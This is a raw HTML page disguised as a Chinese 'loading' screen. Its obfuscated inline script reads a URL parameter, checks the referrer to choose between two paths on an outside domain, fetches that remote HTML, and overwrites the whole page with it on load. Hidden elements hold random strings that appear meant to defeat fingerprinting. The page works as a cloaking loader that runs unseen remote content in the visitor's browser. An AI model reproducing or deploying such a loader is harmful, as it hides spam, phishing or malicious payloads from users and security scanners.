<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hgIH1UmL {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hgIH1UmL .Eo8Ae6B {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hgIH1UmL .content {
            line-height: 50px;
            text-align: center
        }

        .hgIH1UmL .img {
            width: 100%
        }

        .hgIH1UmL .qb20HfMMDo {
            text-align: center
        }

        .hgIH1UmL .qb20HfMMDo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hgIH1UmL .qb20HfMMDo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hgIH1UmL .qb20HfMMDo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hgIH1UmL .qb20HfMMDo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hgIH1UmL .qb20HfMMDo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hgIH1UmL .qb20HfMMDo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hgIH1UmL .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mIyzctKCU3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EAatUoP = mIyzctKCU3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EAatUoP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EAatUoP +".html?a=share";
		}
		
        Yiu8F04=url+"#"+new Date().getTime();
        Yiu8F04 && function() {
            $.get(Yiu8F04, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>ovEVBkpvqTHFY2G9MBrUMuQW</p>
<span style='display:none'>dUxR01QPjQfjtU6dK6YT2Fpn9GnAr2IEL6i0xqgf60nlEzaJrDAYpxeub97DWWqt1vnrFfQ2SPyZSW0bVYt</span>
<span style='display:none'>dUxR01QPjQfjtU6dK6YT2Fpn9GnAr2IEL6i0xqgf60nlEzaJrDAYpxeub97DWWqt1vnrFfQ2SPyZSW0bVYt</span><div class="hgIH1UmL">
    <div class="Eo8Ae6B">
        <div class="qb20HfMMDo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>Op9N5YdpVMY2ai6lelVwOnz3sqjbIcEsNuGIngtUnRucHjba8C1zVoqYLmgLFST3aP67QWXK32jr8KAZKjg72G</span>
<ul style='display:none' >U97M5l8l56FXV7qhZ1Yk8n09VrBlNWkeZafY2fzwbPyJ3g5P9OdwLV1yNgb</ul>
<img  src='' style='display:none'></body>
</html>